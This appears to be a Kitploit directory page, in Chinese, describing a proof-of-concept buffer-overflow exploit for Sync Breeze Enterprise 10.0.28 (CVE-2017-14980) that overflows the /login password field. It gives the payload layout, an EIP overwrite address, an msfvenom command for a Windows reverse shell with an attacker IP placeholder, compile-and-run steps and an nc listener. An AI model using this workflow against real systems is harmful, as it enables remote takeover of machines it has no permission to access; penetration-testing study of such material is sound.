Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — 针对 Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) 的概念验证缓冲区溢出利用程序。发送精心构造的 HTTP POST 载荷,覆盖 EIP 并执行自定义 x86 shellcode 以实现任意代码执行。 | Kitploit
工具/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试二进制利用
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

CVE-2017-14980_syncbreeze_10.0.28_bof

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对 Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) 的概念验证缓冲区溢出利用程序。发送精心构造的 HTTP POST 载荷,覆盖 EIP 并执行自定义 x86 shellcode 以实现任意代码执行。

查看仓库
231年前尚未审核

漏洞利用 - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

本仓库包含一个针对 Sync Breeze Enterprise 10.0.28 版本的**缓冲区溢出利用(BOF)**概念验证,针对漏洞 CVE-2017-14980。

描述

该漏洞源于在处理向 /login 端点发送的 POST 请求中的 password 字段时存在不当输入验证。
攻击者可在此字段中发送超长值,从而覆盖 EIP 并允许任意代码执行。

此漏洞利用发送精心构造的有效负载,包含:

  • 520 字节填充('A')
  • 4 字节覆盖 EIP
  • 20 字节 NOP sled
  • Windows x86 shellcode,可自定义以执行任意命令

工作原理

  1. 漏洞利用构建包含嵌入 shellcode 的恶意缓冲区。
  2. 向易受攻击的服务器发送 HTTP POST 请求,将有效负载置于 password 字段中。
  3. 在处理请求时,应用程序覆盖指令指针(EIP)并执行攻击者提供的 shellcode。

要求

  • 一个 C 编译器(如 gcc)
  • 可访问运行 Sync Breeze Enterprise 10.0.28 的目标网络
  • 必要时调整 EIP 地址(\x83\x0C\x09\x10)和 shellcode

使用 msfvenom 生成 shellcode 示例:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
root@kitploit:~
gcc exploit.c -o exploit
./exploit

root@kitploit:~
nc -nlvp 4444
下载工具